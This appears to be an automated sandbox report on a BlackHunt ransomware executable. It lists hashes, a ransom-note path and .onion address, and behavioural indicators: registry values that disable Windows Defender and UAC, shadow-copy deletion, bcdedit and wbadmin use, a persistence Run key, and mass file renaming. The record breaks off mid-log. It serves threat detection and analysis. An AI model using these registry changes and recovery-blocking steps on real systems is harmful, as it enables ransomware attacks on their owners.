Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:27
Static task
static1
Behavioral task
behavioral1
Sample
0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
Resource
win10v2004-20231215-en
General
-
Target
0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
-
Size
707KB
-
MD5
2fefd34de03404153a505291b8a0cceb
-
SHA1
bbd7c6d175567824a388e8d25378121c00aef233
-
SHA256
0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca
-
SHA512
297d1a9cbaab8f23c172a31f9380e63195b7ed83353c654e49dc37734863bd95a2d592c0195f3e9749f1c834a6b8e6e2751195ac5261e02103879f0994b4deb9
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8nvnh:6uaTmkZJ+naie5OTamgEoKxLWavh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1616 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2316 bcdedit.exe 712 bcdedit.exe -
Renames multiple (2707) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 596 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\B: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\E: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\A: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\Q: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\R: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\I: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\H: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\L: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\K: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\X: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\T: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\Y: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\S: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\G: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\M: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\P: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\J: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\V: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\N: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\U: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened (read-only) \??\O: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.txt 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#BlackHunt_ReadMe.hta 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#BlackHunt_Private.key 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720x480icongraphic.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#BlackHunt_ReadMe.hta 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_Private.key 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#BlackHunt_Private.key 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\Java\jre7\lib\images\#BlackHunt_ReadMe.hta 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.hta 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_Private.key 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_Private.key 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\#BlackHunt_ReadMe.txt 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1656 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2588 vssadmin.exe 3056 vssadmin.exe 2664 vssadmin.exe 2740 vssadmin.exe 2480 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeRestorePrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeBackupPrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeTakeOwnershipPrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeAuditPrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeSecurityPrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeIncBasePriorityPrivilege 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Token: SeBackupPrivilege 2760 vssvc.exe Token: SeRestorePrivilege 2760 vssvc.exe Token: SeAuditPrivilege 2760 vssvc.exe Token: SeBackupPrivilege 1048 wbengine.exe Token: SeRestorePrivilege 1048 wbengine.exe Token: SeSecurityPrivilege 1048 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2696 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 29 PID 2360 wrote to memory of 2696 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 29 PID 2360 wrote to memory of 2696 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 29 PID 2360 wrote to memory of 2696 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 29 PID 2360 wrote to memory of 2692 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 136 PID 2360 wrote to memory of 2692 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 136 PID 2360 wrote to memory of 2692 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 136 PID 2360 wrote to memory of 2692 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 136 PID 2360 wrote to memory of 2872 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 33 PID 2360 wrote to memory of 2872 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 33 PID 2360 wrote to memory of 2872 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 33 PID 2360 wrote to memory of 2872 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 33 PID 2360 wrote to memory of 2884 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 34 PID 2360 wrote to memory of 2884 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 34 PID 2360 wrote to memory of 2884 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 34 PID 2360 wrote to memory of 2884 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 34 PID 2360 wrote to memory of 3036 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 127 PID 2360 wrote to memory of 3036 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 127 PID 2360 wrote to memory of 3036 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 127 PID 2360 wrote to memory of 3036 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 127 PID 2360 wrote to memory of 2720 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 39 PID 2360 wrote to memory of 2720 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 39 PID 2360 wrote to memory of 2720 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 39 PID 2360 wrote to memory of 2720 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 39 PID 2360 wrote to memory of 2316 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 149 PID 2360 wrote to memory of 2316 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 149 PID 2360 wrote to memory of 2316 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 149 PID 2360 wrote to memory of 2316 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 149 PID 2360 wrote to memory of 2748 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 42 PID 2360 wrote to memory of 2748 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 42 PID 2360 wrote to memory of 2748 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 42 PID 2360 wrote to memory of 2748 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 42 PID 2696 wrote to memory of 2624 2696 cmd.exe 44 PID 2696 wrote to memory of 2624 2696 cmd.exe 44 PID 2696 wrote to memory of 2624 2696 cmd.exe 44 PID 2360 wrote to memory of 2840 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 45 PID 2360 wrote to memory of 2840 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 45 PID 2360 wrote to memory of 2840 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 45 PID 2360 wrote to memory of 2840 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 45 PID 2360 wrote to memory of 3000 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 46 PID 2360 wrote to memory of 3000 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 46 PID 2360 wrote to memory of 3000 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 46 PID 2360 wrote to memory of 3000 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 46 PID 2360 wrote to memory of 1972 2360 